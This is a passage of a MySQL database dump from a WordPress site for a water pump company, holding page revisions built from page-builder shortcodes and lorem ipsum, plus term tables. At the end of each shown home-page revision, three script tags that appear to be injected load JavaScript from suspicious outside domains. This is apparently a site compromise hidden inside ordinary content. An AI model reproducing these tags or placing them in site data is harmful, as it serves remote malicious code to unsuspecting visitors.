10px !important;}\"]\r\n<h5>Article Area</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why Choose Us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Best Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Happy Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"9%\" bottom_padding=\"9%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:83|text_align:center|color:%23ffffff|line_height:96px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We will help you a lot!\r\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 01:05:19','2018-01-30 01:05:19','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6687,1,'2018-01-30 01:06:04','2018-01-30 01:06:04','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>PT Dabinter Pompa Air</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"100\" bottom_padding=\"10\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10\" bottom_padding=\"100\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]\r\n<h5>Our Product</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]\r\n<h5>Frequently Asked Question</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 10px !important;}\"]\r\n<h5>Article Area</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why Choose Us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Best Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Happy Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:64|text_align:center|color:%23ffffff|line_height:80px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We will help you a lot!\r\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 01:06:04','2018-01-30 01:06:04','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0);
/*!40000 ALTER TABLE `wm_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_term_relationships`
--

DROP TABLE IF EXISTS `wm_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_term_relationships`
--

LOCK TABLES `wm_term_relationships` WRITE;
/*!40000 ALTER TABLE `wm_term_relationships` DISABLE KEYS */;
INSERT INTO `wm_term_relationships` VALUES (6144,2,0),(6189,24,0),(6191,24,0),(6192,24,0),(6229,3,0),(6232,24,0),(6239,24,0),(6240,24,0),(6258,24,0),(6259,24,0),(6262,24,0),(6265,24,0),(6268,24,0),(6271,24,0),(6274,24,0),(6277,24,0),(6280,24,0),(6283,24,0),(6286,24,0),(6289,24,0),(6292,24,0),(6295,24,0),(6350,24,0),(6355,24,0),(6357,1,0),(6360,24,0),(6363,24,0),(6366,24,0),(6369,24,0),(6374,24,0),(6377,24,0),(6380,24,0),(6383,24,0),(6386,24,0),(6389,24,0),(6392,24,0),(6395,24,0),(6398,24,0),(6401,24,0),(6404,24,0),(6407,24,0),(6410,24,0),(6415,24,0),(6416,24,0),(6419,24,0),(6422,24,0),(6425,24,0),(6428,24,0),(6431,24,0),(6434,24,0),(6437,24,0),(6441,24,0),(6444,24,0),(6447,24,0),(6450,24,0),(6453,24,0),(6458,24,0),(6461,24,0),(6464,24,0),(6467,24,0),(6470,24,0),(6473,24,0),(6476,24,0),(6479,24,0),(6483,24,0),(6486,24,0),(6489,24,0),(6492,24,0),(6495,24,0),(6498,24,0),(6501,24,0),(6504,24,0),(6507,24,0),(6510,24,0),(6513,24,0),(6516,24,0),(6519,24,0),(6522,24,0),(6525,24,0),(6528,24,0),(6531,24,0),(6534,24,0),(6537,24,0),(6540,24,0),(6543,24,0),(6546,24,0),(6549,24,0),(6552,24,0),(6555,24,0),(6558,24,0),(6561,24,0),(6564,24,0),(6567,24,0),(6570,24,0),(6573,24,0),(6577,24,0),(6580,24,0),(6583,24,0),(6586,24,0),(6589,24,0),(6592,24,0),(6595,24,0),(6598,24,0),(6602,24,0),(6605,24,0),(6663,28,0),(6664,28,0),(6665,28,0);
/*!40000 ALTER TABLE `wm_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_term_taxonomy`
--

DROP TABLE IF EXISTS `wm_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_term_taxonomy`
--

LOCK TABLES `wm_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wm_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wm_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'category','',0,1),(3,3,'category','',0,1),(9,9,'post_tag','',0,0),(10,10,'post_tag','',0,0),(11,11,'post_tag','',0,0),(12,12,'post_tag','',0,0),(13,13,'post_tag','',0,0),(14,14,'post_tag','',0,0),(15,15,'post_tag','',0,0),(16,16,'post_tag','',0,0),(17,17,'post_tag','',0,0),(18,18,'post_tag','',0,0),(19,19,'post_tag','',0,0),(20,20,'post_tag','',0,0),(21,21,'post_tag','',0,0),(22,22,'post_tag','',0,0),(23,23,'post_tag','',0,0),(24,24,'nav_menu','',0,102),(25,25,'post_format','',0,0),(26,26,'post_format','',0,0),(27,27,'post_format','',0,0),(28,28,'nav_menu','',0,3);
/*!40000 ALTER TABLE `wm_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_termmeta`
--

DROP TABLE IF EXISTS `wm_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_termmeta`
--

LOCK TABLES `wm_termmeta` WRITE;
